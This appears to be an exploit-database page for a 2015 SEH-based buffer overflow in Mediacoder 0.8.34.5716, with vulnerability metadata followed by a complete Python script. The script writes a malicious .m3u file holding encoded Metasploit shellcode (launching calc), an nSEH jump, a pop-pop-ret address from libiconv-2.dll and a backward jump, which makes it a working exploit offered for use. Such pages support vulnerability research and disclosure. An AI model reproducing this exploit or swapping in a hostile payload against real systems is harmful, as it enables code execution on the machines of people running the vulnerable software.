header-logo
Suggest Exploit
vendor:
Mediacoder
by:
@evil_comrade
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Mediacoder
Affected Version From: 0.8.34.5716
Affected Version To: 0.8.34.5716
Patch Exists: NO
Related CWE:
CPE: a:mediacoder:mediacoder:0.8.34.5716
Metasploit:
Other Scripts:
Platforms Tested: Windows XP3
2015

Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)

Buffer overflow exploit in Mediacoder version 0.8.34.5716. The exploit takes control of the EIP and jumps backwards to avoid bad bytes.

Mitigation:

Apply the latest patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com 
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe

# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also 
#        avoid a few bad bytes after the "A"s.

#!/usr/bin/python
buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] = 
buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret  | [libiconv-2.dll] 
seh="\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55) 
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()